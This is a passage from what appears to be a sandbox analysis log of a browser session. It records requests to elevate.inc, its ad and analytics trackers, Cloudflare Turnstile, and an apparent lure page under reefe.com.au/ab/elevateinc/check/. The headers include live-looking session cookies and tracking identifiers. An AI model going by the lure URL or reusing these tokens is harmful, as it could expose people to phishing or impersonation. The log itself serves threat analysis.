CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: if
                    Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/images/all.min.css HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /js/mida-goal.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/91b8d9bf2593/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241150624&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzFNXrD_i2mMUfmELkVn8p5-JwwtKEGQ&random=1818643691&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241151096&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyz9MFS1RGGa_gdFZYVFIcJ6Hik-C0EyA&random=2211702013&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=19524073&utk= HTTP/1.1host: forms.hscollectedforms.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /s/0.8.9/clarity.js HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: CLID=e8bfaca89f5f443d9e841459d6fbfb36.20250606.20260606
                    Source: global trafficHTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://reefe.com.au/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /ccm/collect?en=page_view&dl=https%3A%2F%2Fwww.elevate.inc%2Four-story&scrsrc=www.googletagmanager.com&frm=0&rnd=1668639285.1749241150&dt=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&auid=1637307519.1749241150&navt=n&npa=0&gtm=45He5641v9174023338za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&tft=1749241150364&tfd=3438&apve=1&apvf=f HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /integration/enabled/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/jyths/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
                    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241150624&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzFNXrD_i2mMUfmELkVn8p5-JwwtKEGQ&random=1818643691&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241151096&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1637307519.1749241150&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyz9MFS1RGGa_gdFZYVFIcJ6Hik-C0EyA&random=2211702013&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749241150977&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: *sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0origin: https://www.elevate.incattribution-reporting-eligible: trigger;event-source;navigation-sourceattribution-reporting-support: web, not-ossec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241150977&li_adsId=a08736dc-d6cd-4b46-aa03-d86286a7d437&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /widget/event/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1001588542:1749238352:KKQGD2uGDKVNRdJ-odTxPeg7RnptWuv-xrNA5Wi_1YU/94ba9a6f4b2ee766/DsQev4EtRF94K4j7IwqqLwUcBgGU0sKjVfYfjWlh55w-1749241151-1.2.1.1-f0zQPsw4CCEfYh0ihLOiG0nXJl7lNEccHE04UVD1iJDghe7GPBHkHID_2jqpLPYI HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=19524073 HTTP/1.1host: api.hubapi.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=Jv3hyj0g_FuA77ad680JP5y2or4.d0RDCZUUtRTGSMs-1749241152-1.0.1.1-YgPs6yMLoPaYsaqs._McOo7L_XzRZaSslK_3AJEnqKieXfqAn8vg5_Uoq1r5.qUd9qaVceDrZsj4dBK3bPubvDidlVjTlFm.fqm3OGDVXhg; _cfuvid=fSQ6_lOKwIHKY_ck45u4ex1NLHtKAymaczUF418YY6o-1749241152762-0.0.1.1-604800000
                    Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241150977&li_adsId=a08736dc-d6cd-4b46-aa03-d86286a7d437&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2&cookiesTest=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=3a8b9217-ce66-41df-94c7-7440f4b97bfacookie: bcookie="v=2&3a49c610-16af-4c0a-8608-313dc2621c41"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749241152:t=1749327552:v=2:sig=AQFt46LKeqKES_d0Z3o31AclRsUvEkds"priority: i
                    Source: global trafficHTTP traffic detected: GET /test/goal HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /init/uuid HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /integration/enabled/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /widget/event/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/jyths/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                    Source: global trafficHTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94ba9a757aa9e766&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/jyths/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                    Source: global trafficHTTP traffic detected: GET /px/li_sync?redirect=https%3A%2F%2Fpx.ads.linkedin.com%2Fcollect%3Fv%3D2%26fmt%3Djs%26pid%3D3682316%26time%3D1749241150977%26li_adsId%3Da08736dc-d6cd-4b46-aa03-d86286a7d437%26url%3Dhttps%253A%252F%252Fwww.elevate.inc%252Four-story%26tm%3Dgtmv2%26cookiesTest%3Dtrue%26liSync%3Dtrue HTTP/1.1host: www.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=3a8b9217-ce66-41df-94c7-7440f4b97bfacookie: bcookie="v=2&3a49c610-16af-4c0a-8608-313dc2621c41"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749241152:t=1749327552:v=2:sig=AQFt46LKeqKES_d0Z3o31AclRsUvEkds"cookie: UserMatchHistory=AQIDWPUJWcQGmQAAAZdG5caOPHun81XZ91g4sKFME-9i67gzYmhSg8joNAkHViRz67tLgBvjUilZ8Acookie: AnalyticsSyncHistory=AQIxe5FOTWY5JQAAAZdG5caOIzhkp0FBBqpdt2yzf6DGXtKpgXt2IAnGoGQr4ZQ6ecPdcXasWEesmMj_M9tEBwpriority: i
                    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                    Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241150977&li_adsId=a08736dc-d6cd-4b46-aa03-d86286a7d437&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2&cookiesTest=true&liSync=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=3a8b9217-ce66-41df-94c7-7440f4b97bfacookie: bcookie="v=2&3a49c610-16af-4c0a-8608-313dc2621c41"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749241152:t=1749327552:v=2:sig=AQFt46LKeqKES_d0Z3o31AclRsUvEkds"cookie: UserMatchHistory=AQIDWPUJWcQGmQAAAZdG5caOPHun81XZ91g4sKFME-9i67gzYmhSg8joNAkHViRz67tLgBvjUilZ8Acookie: AnalyticsSyncHistory=AQIxe5FOTWY5JQAAAZdG5caOIzhkp0FBBqpdt2yzf6DGXtKpgXt2IAnGoGQr4ZQ6ecPdcXasWEesmMj_M9tEBwpriority: i
                    Source: global trafficHTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749241150977&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=3a8b9217-ce66-41df-94c7-7440f4b97bfacookie: bcookie="v=2&3a49c610-16af-4c0a-8608-313dc2621c41"cookie: lidc="b=OGST09:s=O:r=O:a=O:p=O:g=3157:u=1:x=1:i=1749241152:t=1749327552:v=2:sig=AQFt46LKeqKES_d0Z3o31AclRsUvEkds"priority: u=1, i
